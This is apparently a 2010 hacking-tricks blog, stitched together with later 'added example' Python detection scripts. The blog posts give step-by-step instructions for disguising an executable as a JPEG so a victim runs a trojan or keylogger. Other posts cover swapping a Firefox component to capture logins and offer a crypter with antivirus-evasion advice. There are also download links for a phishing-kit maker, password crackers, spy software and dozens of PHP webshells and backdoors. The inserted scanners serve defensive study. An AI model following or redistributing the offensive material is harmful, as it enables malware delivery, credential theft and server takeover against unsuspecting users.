Monday, December 13, 2010

Windows 7 Ultra Control Panel Trick

Well, many of you may not know about this, but Windows 7 has a hidden feature that gives you more than 250 control options in one place, options which under normal circumstances would require you to search around for them...


I use it to bunch all the utilities together so that I can keep them handy...

>> Create a new folder
>> Rename the folder to
MaxCaps_Utilities.{ED7BA470-8E54-465E-825C-99712043E01C}
>> Voila! The folder now has nearly all the options you want.

Convert Your .exe to .jpeg
Hi,

Here I am going to show you how to make a .exe file look like a .jpeg.
Mostly this trick is used for sending keyloggers, Trojans or viruses to a victim. So if you want to change your .exe files to .jpeg, follow the steps below.

1) First of all go to Folder Options.

2) Tick "Show hidden files and folders" and untick "Hide extensions for known file types".

3) Make a new folder and copy your exe file into it. (Suppose the name of your .exe file is server.exe.)

4) Rename server.exe to server.jpeg. (We are only changing the extension of this file.)

5) Create a shortcut to server.jpeg in the same folder.

6) Rename the shortcut file, say to abc.jpeg.

7) Now you have to make some changes in the properties of abc.jpeg.

8) Go to the properties of abc.jpeg.

9) Delete all the text in the "Start In" field and leave it empty.

10) Now in the Target field write the path below (the path of the original file):
C:\WINDOWS\system32\cmd.exe /c server.jpeg

11) You have an option to change the icon. Click it; a new window will pop up, and there you have to enter this:

%SystemRoot%\system32\SHELL32.dll

12) Then press OK.

13) Go to the properties of server.jpeg and make it hidden.

Now we are ready to send the jpeg file. When someone double-clicks abc.jpeg it automatically executes our server.jpeg file. But don't forget to put both files in the same folder. The best way to send these files together to someone is to compress them into a Zip or Rar archive.
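As an added defender-side example (not part of the original post), here is a small Python scanner for the two artefacts this trick leaves behind: a file with an image extension whose first bytes are a PE header, and a shortcut (Explorer shows a shortcut without its .lnk extension, so abc.jpeg.lnk appears as abc.jpeg) whose target runs cmd.exe /c. The files it scans are constructed in a temporary directory; the names server.jpeg and abc.jpeg.lnk come from the steps above, and the shortcut bytes are a stand-in carrying only the real .lnk header followed by the target string, not a complete shortcut.

```python
import os
import re
import tempfile

# Format signatures the disguise relies on nobody checking: a PE executable begins
# with "MZ", a genuine JPEG with FF D8 FF, and a Windows shortcut with the
# HeaderSize 0x4C followed by the ShellLink CLSID {00021401-0000-0000-C000-000000000046}.
PE_MAGIC = b"MZ"
JPEG_MAGIC = b"\xff\xd8\xff"
LNK_MAGIC = b"\x4c\x00\x00\x00\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"
IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".bmp"}

CMD_PATTERN = re.compile(r"cmd\.exe\s*/c\b", re.IGNORECASE)


def findings_for(name, data):
    """Return a list of findings for one file, given its name and its leading bytes."""
    out = []
    stem, ext = os.path.splitext(name.lower())
    if ext in IMAGE_EXTS and data.startswith(PE_MAGIC):
        out.append("image extension but PE executable header (MZ)")
    if data.startswith(LNK_MAGIC):
        # A shortcut stores its target and arguments as ANSI or UTF-16LE strings;
        # decode both ways (and at both byte alignments) before searching.
        views = [data.decode("latin-1"),
                 data.decode("utf-16-le", errors="ignore"),
                 data[1:].decode("utf-16-le", errors="ignore")]
        if any(CMD_PATTERN.search(v) for v in views):
            out.append("shortcut runs cmd.exe /c (hidden command execution)")
        # Explorer hides ".lnk", so "abc.jpeg.lnk" is displayed as "abc.jpeg".
        if ext == ".lnk" and os.path.splitext(stem)[1] in IMAGE_EXTS:
            out.append("shortcut whose visible name ends in an image extension")
    return out


def scan_dir(path):
    """Scan every file under path; return {relative_path: [findings]} for hits only."""
    hits = {}
    for root, _dirs, files in os.walk(path):
        for fn in files:
            full = os.path.join(root, fn)
            with open(full, "rb") as fh:
                head = fh.read(65536)  # signatures and target strings sit near the start
            found = findings_for(fn, head)
            if found:
                hits[os.path.relpath(full, path)] = found
    return hits


def build_sample_lnk(target):
    """Constructed stand-in for a .lnk: the real 76-byte header, then the target as UTF-16LE."""
    return LNK_MAGIC + b"\x00" * 56 + target.encode("utf-16-le")


def demo():
    """Write constructed samples (not real malware) to a temp dir and scan them."""
    with tempfile.TemporaryDirectory() as d:
        samples = {
            "photo.jpg": JPEG_MAGIC + b"\xe0" + b"\x00" * 64,        # genuine image header
            "server.jpeg": PE_MAGIC + b"\x90\x00" + b"\x00" * 64,    # executable renamed
            "abc.jpeg.lnk": build_sample_lnk(r"C:\WINDOWS\system32\cmd.exe /c server.jpeg"),
        }
        for name, content in samples.items():
            with open(os.path.join(d, name), "wb") as fh:
                fh.write(content)
        return scan_dir(d)


if __name__ == "__main__":
    for path, findings in demo().items():
        print(path, "->", "; ".join(findings))
```

Point scan_dir at an extracted archive or a download folder; the header check is cheap because only the first 64 KiB of each file is read, and the .lnk check does not depend on the "hide extensions" setting that step 2 above relies on.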
Firefox as a Keylogger
Hi friends, today I am going to share a trick. With the help of this trick you can use your Firefox as a keylogger.

1) Download the attached file and change its extension from .txt to .js.

2) Install Firefox and open C:\Program Files\Mozilla Firefox\components.

3) In the components folder there is a file named nsLoginManagerPrompter.js.

4) Replace the original file with the downloaded one.

5) Now whenever you enter a username and password in Firefox, it is automatically saved in your browser.

To view the passwords, open Firefox and go to Tools --> Options --> Security --> Saved Passwords --> Show Passwords.

Hope you like it....
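An added example, not from the original post, showing the file-integrity check that catches step 4 above: take SHA-256 hashes of an install directory right after a clean install, then compare the tree against that baseline later. The directory layout (a components folder holding nsLoginManagerPrompter.js) is built in a temporary directory as a constructed stand-in for the Firefox install directory named above; the same two functions work unchanged on the real one.

```python
import hashlib
import os
import tempfile


def sha256_file(path):
    """SHA-256 of a file, read in chunks so large binaries do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Map every file under root (relative path, forward slashes) to its SHA-256."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            full = os.path.join(dirpath, fn)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = sha256_file(full)
    return baseline


def verify(root, baseline):
    """Compare the tree under root against a baseline; report changed, missing and new files."""
    current = build_baseline(root)
    return {
        "changed": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "missing": sorted(p for p in baseline if p not in current),
        "new": sorted(p for p in current if p not in baseline),
    }


def demo():
    """Constructed scenario: snapshot a fake install dir, swap one component, re-verify."""
    with tempfile.TemporaryDirectory() as root:
        comp = os.path.join(root, "components")
        os.makedirs(comp)
        target = os.path.join(comp, "nsLoginManagerPrompter.js")
        with open(target, "w") as fh:
            fh.write("// original component (constructed placeholder)\n")
        with open(os.path.join(root, "firefox.exe"), "wb") as fh:
            fh.write(b"MZ placeholder")
        baseline = build_baseline(root)          # taken while the install is known-good
        with open(target, "w") as fh:            # the swap that step 4 above describes
            fh.write("// modified component (constructed placeholder)\n")
        with open(os.path.join(comp, "extra.js"), "w") as fh:
            fh.write("// file that was never part of the install\n")
        return verify(root, baseline)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

Store the baseline somewhere the browser's own account cannot write to (or sign it); a baseline kept next to the files it protects can be replaced along with them.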

Private Crypter Ready to Download Here........!

Hey guys, Rockey's Private Crypter is ready; now you can download it here!

Simple GUI
Good encryption (will improve in the next version)

Test my crypter & post your reviews here!

Warning :- Please don't upload your server to VirusTotal! You can check it on Novirusthanx.com

Crypter image



Download Link :-

Rockey's Private Crypter


Rar Password :-

a0E0QTFrQko2MHRURXp5SA==

Encryption Method :- GILA7 > HAZZ15 > TIGO-3FX > BASE-64

Application Password :- crypt

Javascript to view password behind ******

Hi friends, basically you are not able to read a password because it is shown as asterisks. There is some software we use to read the password, but such software is not compatible with every browser. So here is one JavaScript with the help of which you can read the password value, and this JavaScript works fine with every browser.

JAVASCRIPT CODE (URL-decoded) :-

javascript:(function(){
  var s, F, j, f, i;
  s = "";
  F = document.forms;
  for (j = 0; j < F.length; ++j) {
    f = F[j];
    for (i = 0; i < f.length; ++i) {
      if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n";
    }
  }
  if (s) alert("saneh : The Password On This Page:\n\n" + s);
  else alert("There are no passwords in forms on this page.");
})();

Download tools part - 1

AA tools.zip (3.14 MB)
advanced-administrative-tools



Download link:- http://www.fileserve.com/file/E87uGmt
Password:- rocks

Advanced Archive Password Recovery 2.20.zip (794.66 KB)

Advanced Archive Password Recovery 2.20 is a program to recover lost or forgotten passwords to archives (compressed files) of the following types:

- ZIP/PKZip/WinZIP (all versions except PKZip 5.x)
- ACE/WinACE (1.x)
- ARJ/WinARJ
- RAR/WinRAR

At the moment, there is no known method to extract the password from such compressed files, so the only available methods are “brute force” and dictionary attacks (for ARJ and ZIP formats, known-plaintext attack is also available).

The key features of Advanced Archive Password Recovery 2.20 are:

- The program has a convenient user interface
- The program is very fast: for ZIP, brute-force attack speed is up to 15 million passwords per second (on Pentium III)
- Guaranteed decryption (usually within the hour) of most WinZip archives (with 5+ encrypted files) is available; it works regardless of the password complexity and length
- The program can work with archives containing only one encrypted file (at about the same speed)
- Self-extracting archives are supported
- The program is customizable: you can set the password length (or length range), the character set to be used to generate the passwords, and a lot of other options
- You can select the custom character set for brute-force attack (non-English characters are supported)
- Dictionary-based attack is available
- The “brute-force with mask” attack is available
- The maximum password length is not limited (in registered version)
- Very fast known-plaintext attack is available (for ZIP and ARJ)
- No special virtual memory requirements
- You can interrupt the program at any time, and start from the same point later
- The program can work in the background, using the CPU only when it is in idle state



Download Link:- http://www.fileserve.com/file/B4ZhE7S
Password:- rocks

All Dos Commands.zip (82.40 KB)
Text file which contains all DOS commands.

Download link:- http://www.fileserve.com/file/rEZsJRY
password :- rocks

AntiARP_6.0.1_DGN_CW.zip (8.73 MB)
This is the new English version of AntiARP 6.0.0, which was released on 14-1-2009.
No more problems with your internet connection, no more sniffing and stealing your passwords.


Download Link:- http://www.fileserve.com/file/R9Ecpnt
Password:-rocks

Phisher_Maker_3.1.zip (1.69 MB)



Features:
1. Fastest phisher maker tool ever
2. Makes phisher for almost any site
3. Only 3 steps to make phisher [1,2,3 and go]
4. Useful for users who don't know HTML or PHP coding
5. No manual work except entering the URL of the website for which you want to make the phisher
6. Fully automated tool
7. Small in size.
8. Progress bar is provided.
9. Instant access to phishers you created.

Download Link:- http://www.fileserve.com/file/cZEVQfy
Password:- rocks

Cryptosystem ME6.zip (2.35 MB)
Cryptosystem ME6 is Windows software intended for encryption and decryption of single files or multiple files on PCs, for secure storage or secure transmission. It uses a 500-bit key for security, and has features designed to minimize the chances of user error.



Download link:- http://www.fileserve.com/file/cB9J4Hf
Password:- rocks

Invisible Sec.zip (3.31 MB)
Invisible Secrets 4 not only encrypts your data and files for safe keeping or for secure transfer across the net, it also hides them in places that on the surface appear totally innocent, such as picture or sound files, or web pages.
It features strong file encryption algorithms (including AES - Rijndael), a password management solution that stores all your passwords securely and helps you create secure passwords, a shredder that helps you destroy beyond recovery files, folders and internet traces, a locker that allows you to password protect certain applications, the ability to create self-decrypting packages.



Download link:- http://www.fileserve.com/file/33TZrHM
password:- rocks

JVCrypt Setup.zip (3.03 MB)



JvCrypt is a powerful encryption and compression utility that allows you to create encrypted files and text messages with up to 448-bit encryption using the advanced Blowfish encryption algorithm.

Download link:- http://www.fileserve.com/file/7WfYqQG
password:- rocks

KFsens10.zip (2.50 MB)
KFSensor is a host based Intrusion Detection System (IDS).
It acts as a honeypot to attract and detect hackers by simulating vulnerable system services and trojans. The system is highly configurable and features detailed logging, analysis of attacks



Download link:- http://www.fileserve.com/file/wYA8XGP
password :- rocks

LAN Search pro.zip (1.13 MB)
LAN Search Pro is a free utility for fast file searching across your LAN. You can search for specific file names or for specific file types (e.g. all MP3 files). LAN Search Pro provides a lightning fast search engine and lets you search hidden network resources, restricted access resources, IP subnets, LAN FTP servers and much more. It comes with a built-in password manager to store your network logins for resources with restricted access.



Download Link:- http://www.fileserve.com/file/ACYgBSd
password:- rocks


MAC Address Changer.zip (331.34 KB)


download link :- http://www.fileserve.com/file/uDvgesW
password:- rocks


Multi MD5 Online Hash Cracker.zip (988.26 KB)



Download Link:- http://www.fileserve.com/file/6nXGWeh
password:- rocks


NeoTrace_Professional_3.25__portable__2.zip (2.46 MB)

NeoTrace Pro delivers a powerful tool for checking information on Internet site. You can trace any computer on the internet simply by entering an email, IP address or URL. The display shows you the route between you and the remote site including all intermediate nodes and their registrant information. NeoTrace is the world's most popular Internet tracer, used by law enforcement, ISPs, and network professionals yet it is easy enough for home users to use.



Download Link :- http://www.fileserve.com/file/XxC7JgR
password:- rocks


NetConceal Anonymizer v3.6.041.02.zip (702.62 KB)

NetConceal Anonymizer keeps your online privacy by hiding your real IP address from anyone. Use your favorite network applications - web browsers, instant messengers, file sharing and others, but stay anonymous and secure.



Download Link :- http://www.fileserve.com/file/9nJuFsG
password:- rocks

Netstat-Viewer.zip (463.59 KB)

Netstat Viewer is a handy GUI replacement for the command line application "netstat".



Download Link:- http://www.fileserve.com/file/3EPqmCB
password:- rocks

PDF.Password.Remover.v3.0M.zip (3.12 MB)

PDF files with passwords can be quite irritating. With the help of PDF Password Remover, decryption is done instantly. The decrypted file can be opened in any PDF viewer (e.g. Adobe Acrobat Reader) without any restrictions, i.e. with edit/copy/print functions enabled.

100% working Tested....



Download Link :- http://www.fileserve.com/file/DKsC9WH
password :- rocks

Putty.zip (385.62 KB)

PuTTY is a free implementation of Telnet and SSH for Windows and Unix platforms, along with an xterm terminal emulator. It is written and maintained primarily by Simon Tatham.

The latest version is beta 0.60.

LEGAL WARNING: Use of PuTTY, PSCP, PSFTP and Plink is illegal in countries where encryption is outlawed. I believe it is legal to use PuTTY, PSCP, PSFTP and Plink in England and Wales and in many other countries, but I am not a lawyer and so if in doubt you should seek legal advice before downloading it. You may find this site useful (it's a survey of cryptography laws in many countries) but I can't vouch for its correctness.



Download link:- http://www.fileserve.com/file/w7E9n57
password:- rocks


RapidshareHacking.zip (264.47 KB)

Download Link :- http://www.fileserve.com/file/QEyh3SY
password :- rocks

RAR Password Cracker v4.11.zip (503.96 KB)

Program to recover (crack) forgotten RAR/WinRAR passwords.



Download Link :- http://www.fileserve.com/file/U5hgkXA
password:- rocks


YeoPan101.zip (126.37 KB)

Encryption utility

No image.!

Download link :- http://www.fileserve.com/file/6rkpPS8
password :- rocks



tunnel.zip (2.78 MB)



Download link :- http://www.fileserve.com/file/TCMyaxQ
Password :- rocks


SoloKeepSetup.zip (846.06 KB)

SoloKeep is a fast and easy-to-use application that stores all your passwords using encryption and password protection. SoloKeep can keep track of those hard-to-remember website passwords and other login information, using a powerful encryption algorithm.



Download link :- http://www.fileserve.com/file/89cxtyN
password :- rocks

Safe and quick hide folders.zip (2.45 MB)

Safe&Quick Hide Files has three major functions: hide files and folders, encrypt files, and camouflage files and folders. These three major functions make it a super private-information protector.

Download Link :- http://www.fileserve.com/file/yj2hrp6
password:- rocks


ResHacker.zip (735.83 KB)

Resource HackerTM is a freeware utility to view, modify, rename, add, delete and extract resources in 32bit Windows executables and resource files (*.res). It incorporates an internal resource script compiler and decompiler and works on Win95, Win98, WinME, WinNT, Win2000 and WinXP operating systems.

Viewing Resources: Cursor, Icon, Bitmap, GIF, AVI, and JPG resource images can be viewed. WAV and MIDI audio resources can be played. Menus, Dialogs, MessageTables, StringTables, Accelerators, Delphi Forms, and VersionInfo resources can be viewed as decompiled resource scripts. Menus and Dialogs can also be viewed as they would appear in a running application.



Download Link :- http://www.fileserve.com/file/MVwfhAj
password :- rocks


RemoteDesktopSpySetup.zip (2.14 MB)

Remote Desktop Spy is a computer surveillance program which can be used in the home, school or office to monitor and record every detail of PC and Internet activity. It records programs used, keystrokes typed and web sites visited, and takes screenshots.

Download Link :- http://www.fileserve.com/file/uYz7Zwd
password:- rocks


Remote Shutdown.zip (2.30 MB)



Download Link :- http://www.fileserve.com/file/ZAtG2Hg
password :- rocks

proxy switcher.exe (14.92 MB)

Hide your IP address from the web sites you visit.
Penetrate bans and blocks on forums, classifieds and download sites (rapidshare etc.).
Automatic proxy server switching for improved anonymous surfing.
Easy way to change proxy settings on the fly.
For webmasters - check search engine results from different countries.
Fully compatible with Internet Explorer, Firefox, Opera and others.
Advanced proxy list scanning and management.



Download link :- http://www.fileserve.com/file/mmWsBms
password :- rocks



More Tools Coming Soon.................................!
xp admin password changing through cmd prompt
Steps:

Open a cmd prompt.

Type:
net user
and hit Enter.
Then you can see all current user accounts & guest names.

Then type
net user abc *
and hit Enter.
(abc is my admin account name.)

It asks you to type a new password.

Increase Browsing speed in windows xp professional
How To Increase Your Internet Speed By 20%

If you use Windows XP Professional then it is possible to squeeze an extra 20% out of your internet connection. By default Windows XP Pro holds back 20% of your Internet speed for various services like windows update and spyware checks.

If you want to tap into this locked speed then make the following changes:

1. Go to Start-> Run-> and type gpedit.msc
2. Expand the Administrative Templates branch
3. Expand the Network tab
4. Highlight QoS Packet Scheduler
5. Click on Limit Reservable Bandwidth and check the enabled box
6. Then Change the Bandwidth limit % to 0 %

Once you have done this click apply and restart your PC. After rebooting you should see a noticeable improvement in your net speed.
tracing ip address location of website
Click on start menu
then select run and type cmd
then enter the following command
"tracert (name of the website) eg: tracert http://www.youtube.com
then press enter button

it will show many ipaddresses how the ip address is travelling.
then select the last shown ipaddress,shown inside brackets and copy it

then open the browser and enter the following url

http://www.ip-address.com/ipaddresstolocation/

then paste the ip address in the find location text.

then it will show where the ipaddress location is.

lets try its very interesting. Using this url address we can find out our ip address location also.
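Added example (not part of the original post): a Python parser for Windows tracert output that picks out each hop's address, returns the last answering hop that the text says to copy, and separates RFC 1918 addresses (your own router, your ISP's internal hops) from routable ones, since only the latter can be meaningfully looked up in a geolocation service. The tracert output it parses is a constructed sample using documentation addresses, not a real trace.

```python
import ipaddress
import re

# Constructed sample of Windows tracert output (documentation addresses, not a real trace).
SAMPLE_TRACERT = """
Tracing route to www.example.com [203.0.113.10]
over a maximum of 30 hops:

  1    <1 ms    <1 ms    <1 ms  192.168.1.1
  2    12 ms    11 ms    12 ms  10.0.0.1
  3     *        *        *     Request timed out.
  4    25 ms    24 ms    26 ms  edge-router.example.net [198.51.100.7]
  5    40 ms    39 ms    41 ms  www.example.com [203.0.113.10]

Trace complete.
"""

IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"
HOP_LINE = re.compile(r"^\s*(\d+)\s+(.*\S)\s*$")          # hop number, then the rest
BRACKETED_IP = re.compile(r"\[(" + IPV4 + r")\]")          # "host.example [1.2.3.4]"
BARE_IP = re.compile(r"(" + IPV4 + r")\s*$")               # line that ends in a bare address
RTT = re.compile(r"(<1|\d+)\s*ms")

RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def parse_tracert(text):
    """Turn tracert output into hops: {hop, ip, rtts_ms, timed_out}. ip is None when no reply."""
    hops = []
    for line in text.splitlines():
        m = HOP_LINE.match(line)
        if not m:
            continue                      # banner, blank and "Trace complete." lines
        hop, rest = int(m.group(1)), m.group(2)
        found = BRACKETED_IP.search(rest) or BARE_IP.search(rest)
        hops.append({
            "hop": hop,
            "ip": found.group(1) if found else None,
            "rtts_ms": [0 if r == "<1" else int(r) for r in RTT.findall(rest)],
            "timed_out": "Request timed out" in rest,
        })
    return hops


def last_hop_ip(text):
    """The address the post says to copy: the last hop that actually answered."""
    answered = [h["ip"] for h in parse_tracert(text) if h["ip"]]
    return answered[-1] if answered else None


def is_rfc1918(ip):
    return any(ipaddress.ip_address(ip) in net for net in RFC1918)


def routable_hops(text):
    """Hops outside RFC 1918 space; private hops have no public location to look up."""
    return [h["ip"] for h in parse_tracert(text) if h["ip"] and not is_rfc1918(h["ip"])]


if __name__ == "__main__":
    for h in parse_tracert(SAMPLE_TRACERT):
        print(h)
    print("last hop:", last_hop_ip(SAMPLE_TRACERT))
    print("routable:", routable_hops(SAMPLE_TRACERT))
```

Note that the final hop is the address of the server (or the load balancer or CDN node in front of it), so the location you get describes the hosting site, not the people who run the website.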
PHP Shells

PHP Shell is a shell wrapped in a PHP script. It's a tool you can use to execute arbitrary shell commands or browse the filesystem on your remote web server. This replaces, to a degree, a normal telnet connection, and to a lesser degree an SSH connection.

You use it for administration and maintenance of your website, which is often much easier to do if you can work directly on the server. For example, you could use PHP Shell to unpack and move big files around. All the normal command line programs like ps, free, du, df, etc… can be used.
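Added example from the defender's side (not code from the page or from any of the shells listed below): a Python scanner that scores PHP files for the indicators webshells share, namely command-execution and eval functions, decoding/obfuscation functions, and request input flowing straight into an execution call. The three PHP snippets are constructed test inputs, and the weights and threshold are my own choices rather than any standard.

```python
import re

# Indicator classes with the weight each hit adds to a file's score.
EXEC_FUNCS = ("eval", "assert", "system", "exec", "shell_exec", "passthru", "popen", "proc_open")
OBFUSC_FUNCS = ("base64_decode", "gzinflate", "gzuncompress", "str_rot13")
SUPERGLOBALS = ("$_GET", "$_POST", "$_REQUEST", "$_COOKIE")

EXEC_RE = re.compile(r"\b(" + "|".join(EXEC_FUNCS) + r")\s*\(", re.IGNORECASE)
OBFUSC_RE = re.compile(r"\b(" + "|".join(OBFUSC_FUNCS) + r")\s*\(", re.IGNORECASE)
# An execution function whose argument list (up to the end of the statement) reads request input.
EXEC_FROM_INPUT_RE = re.compile(
    r"\b(?:" + "|".join(EXEC_FUNCS) + r")\s*\([^;]*?\$_(?:GET|POST|REQUEST|COOKIE)\b",
    re.IGNORECASE,
)

THRESHOLD = 4   # chosen so that one execution call plus request input is enough to flag


def score_php(source):
    """Return (score, hits) for one PHP source string."""
    hits, score = [], 0
    for m in EXEC_RE.finditer(source):
        hits.append("exec:" + m.group(1).lower())
        score += 3
    for m in OBFUSC_RE.finditer(source):
        hits.append("obfuscation:" + m.group(1).lower())
        score += 2
    for g in SUPERGLOBALS:
        if g in source:
            hits.append("input:" + g)
            score += 1
    if EXEC_FROM_INPUT_RE.search(source):
        hits.append("exec-from-request-input")
        score += 4
    return score, hits


def scan(files):
    """files: {path: php_source}; returns {path: (score, hits)} for files at or over THRESHOLD."""
    flagged = {}
    for path, source in files.items():
        score, hits = score_php(source)
        if score >= THRESHOLD:
            flagged[path] = (score, hits)
    return flagged


# Constructed samples (test inputs for the scanner, not files from the download list).
SAMPLES = {
    "search.php": "<?php echo 'Results for ' . htmlspecialchars($_GET['q']); ?>",
    "cache.php": "<?php $data = base64_decode(file_get_contents('c.dat')); echo strlen($data); ?>",
    "uploads/img.php": "<?php if (isset($_REQUEST['c'])) { echo shell_exec($_REQUEST['c']); } ?>",
}


if __name__ == "__main__":
    for path, (score, hits) in scan(SAMPLES).items():
        print(f"{path}: score={score} hits={hits}")
```

Heuristic scanners like this catch the plain shells and miss the encoded ones, so treat a hit as a starting point: a PHP file inside an upload directory should rarely exist at all, and comparing the tree against a known-good copy of the site finds additions that no keyword list would.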

Download PHP Shells.

Password for all links :- rocks

_GsC__shell

http://www.4shared.com/file/yX1cvplV/_GsC__shell.html


0x00_PHP_shell

http://www.4shared.com/file/_VKM9keP/0x0...shell.html


_Andr3a92__Sh3ll

http://www.4shared.com/file/tp1BeFXQ/_An...h3ll_.html


__Cod3rZ_Shell__

http://www.4shared.com/file/DxAxWgWL/__C...ell__.html

Ajax_PHP_Command_Shell



http://www.4shared.com/file/wZjZMcxJ/Aja...Shell.html



Anti_Chat_Shell

http://www.4shared.com/file/3Z2B2nrx/Ant...Shell.html

AYT_Shell

http://www.4shared.com/file/bqCBnhbT/AYT_Shell.html

Azrail_Php_Shell



http://www.4shared.com/file/fdWWiC27/Azr...Shell.html


Backup_SQL_Shell

http://www.4shared.com/file/AxgPSH0u/Bac...Shell.html


Bl0od3r_Priv8_Shell

http://www.4shared.com/file/CGovUJF1/Bl0...Shell.html



Bypass_User

http://www.4shared.com/file/HqWSkCv8/Bypass_User.html


C99_Original_Shell



http://www.4shared.com/file/WP0GpDIn/C99...Shell.html


C99_Original_Shell__Underdetec

http://www.4shared.com/file/RNftEbFr/C99...detec.html

C99_Saldiriorg_version



http://www.4shared.com/file/Io6wN-VJ/C99...rsion.html

C100_Yarakam_Modified_Shell



http://www.4shared.com/file/47WPrSe-/C10...Shell.html

CGI_Telnet

http://www.4shared.com/file/VI5YA-wG/CGI_Telnet.html

CShell

http://www.4shared.com/file/KisHKKYc/CShell.html

CTT_Shell

http://www.4shared.com/file/nCmCitXR/CTT_Shell.html


Cyber_Shell

http://www.4shared.com/file/7omydtGQ/Cyber_Shell.html

Dark-Shell

http://www.4shared.com/file/jnEEI3rY/Dark-Shell.html

DC3_Shell__Priv8

http://www.4shared.com/file/q_0GoDsn/DC3...riv8_.html

Dive_Shell

http://www.4shared.com/file/tfwyFvGr/Dive_Shell.html

DTool_Pro_Shell

http://www.4shared.com/file/-auj9Kmj/DTo...Shell.html


DX_Shell

http://www.4shared.com/file/jqlEXYbM/DX_Shell.html


Erne_Safe_Mode_Bypass_Shel

http://www.4shared.com/file/9fKu9ypj/Ern...Shell.html

Fake_email Shell

http://www.4shared.com/file/8KGZei36/Fake_email.html

G00nShell

http://www.4shared.com/file/BpiG9rcz/G00nShell.html

GFS_Shell


http://www.4shared.com/file/E_f9yH5p/GFS_Shell.html


GNY_Shell

http://www.4shared.com/file/Vss8Cu5a/GNY_Shell.html

H4NTU1_Shell

http://www.4shared.com/file/VYCyexWQ/H4NTU1_Shell.html


Heykir_Shell

http://www.4shared.com/file/88BV2gwN/Heykir_Shell.html

HiddenShell

http://www.4shared.com/file/YP8LaVZP/HiddenShell.html

iMHaP_FTP_Shell

http://www.4shared.com/file/vl1lhnTl/iMH...Shell.html

Iron1_Shell

http://www.4shared.com/file/kqP5jQiC/Iron1_Shell.html

http://www.4shared.com/file/PHy19Lhz/Iron_Shell.html

JsBack_-_Shell_Backdoor

http://www.4shared.com/file/LcjIeYYA/JsB...kdoor.html

JSP_Shell

http://www.4shared.com/file/c7qoc0D6/JSP_Shell.html

Kacak_Shell

http://www.4shared.com/file/hQdJTadf/Kacak_Shell.html

KADot_Shell

http://www.4shared.com/file/-6mBbdbQ/KADot_Shell.html


Lama_Shell

http://www.4shared.com/file/UPHWmy28/Lama_Shell.html

Liz0zim_Shell

http://www.4shared.com/file/OB7nOU9J/Liz0zim_Shell.html

Load_Shell

http://www.4shared.com/file/XIE5ANyW/Load_Shell.html

lostDC_shell

http://www.4shared.com/file/gn2_vnkp/lostDC_shell.html

Mackers_Private_PHPShell

http://www.4shared.com/file/UubJhaJ7/Mac...Shell.html


Moroccan_Spamers_Shell

http://www.4shared.com/file/1Nk_AcAG/Mor...Shell.html

MyShell_Shell

http://www.4shared.com/file/JlEIt3IU/MyShell_Shell.html

MySQL_Interface_Shell

http://www.4shared.com/file/WR7mQEDK/MyS...Shell.html

N3fa5t1cA_Sh3ll

http://www.4shared.com/file/4W0g887i/N3f...Sh3ll.html


N3tShell_Emp3ror_Undetectable

http://www.4shared.com/file/oU-2A_xW/N3t...able_.html

N_Shell

http://www.4shared.com/file/OtOUZ5Lw/N_Shell.html

NCC_Shell

http://www.4shared.com/file/OmgPsHuo/NCC_Shell.html

Network_File_Manager_PHP_Shell

http://www.4shared.com/file/V34e7DRy/Net...Shell.html

Nexpl0rer_Shell

http://www.4shared.com/file/RtwOsvuo/Nex...Shell.html


Nix_Remote_Shell

http://www.4shared.com/file/86Of7PRy/Nix...Shell.html

NST_Shell

http://www.4shared.com/file/0UqJ4hZ3/NST_Shell.html

okno_Shell

http://www.4shared.com/file/vN8Q1-eN/okno_Shell.html

OnBoomShell

http://www.4shared.com/file/KnpXFJMX/OnBoomShell.html

PH_Vayv_Shell

http://www.4shared.com/file/vbf77aPi/PH_Vayv_Shell.html

PHANTASMA_Shell

http://www.4shared.com/file/JExrHLos/PHA...Shell.html

PHP_black_shell_that_pwnz_C99

http://www.4shared.com/file/WPpjJJSY/PHP...z_C99.html


PHP_Bypass_Shell

http://www.4shared.com/file/zfiuPrpu/PHP...Shell.html

PHP_Include_With_Shell



http://www.4shared.com/file/WntNAeua/PHP...Shell.html

PHP_Inj_Shell

http://www.4shared.com/file/j7qhZhS2/PHP_Inj_Shell.html


http://www.4shared.com/file/tRJ2E4xb/PHP...Shell.html

http://www.4shared.com/file/1RwfnLln/PHP...Shell.html

R57_IFX_Modified_Shell

http://www.4shared.com/file/FAwRif1l/R57...Shell.html

R57_Kartal_Modified_Shell

http://www.4shared.com/file/JDaMOZZZ/R57...Shell.html

R57_Mohajer22_Shell

http://www.4shared.com/file/oYjj9Hmz/R57...Shell.html

R57_New_Year_Edition_Shell



http://www.4shared.com/file/Tg4CHDbs/R57...Shell.html


R57_ORIGINAL_Shell



http://www.4shared.com/file/dCTc26AN/R57...Shell.html

Remview_Shell

http://www.4shared.com/file/vhwb_KQj/Remview_Shell.html

Root_Access_Shell

http://www.4shared.com/file/3Hy_Lfkt/Roo...Shell.html

S72_Shell

http://www.4shared.com/file/LGpkuZ8U/S72_Shell.html

s101

http://www.4shared.com/file/9zQDaQXz/s101.html

Safe_Mode_Bypass_PHP_442__512_

http://www.4shared.com/file/H347Kn5s/Saf..._512_.html

SIM_Attacker_Shell

http://www.4shared.com/file/lVoQbZeQ/SIM...Shell.html

simple_php_backdoor

http://www.4shared.com/file/sgfSLqfd/sim...kdoor.html

SnIpEr_SA_Shell

http://www.4shared.com/file/72OCGzXr/SnI...Shell.html

StAkeR__Shell

http://www.4shared.com/file/iuy8xvPp/StAkeR__Shell.html

Stres_Bypass_Shell

http://www.4shared.com/file/kWn2TYhL/Str...Shell.html

POPULAR COMMAND PROMPT TRICKS
Save A List of Files to a Text File by Extension

dir *.ext /s /b > files.txt

This command line will create a file called files.txt. When you open this file, there will be a complete list of all the files in that directory and all subdirectories with the .ext extension. You can then open this text file in any text editor and work with the information. By changing the ext part, you can select different files. For example, if you wanted to list all of the PDF documents, you would type:

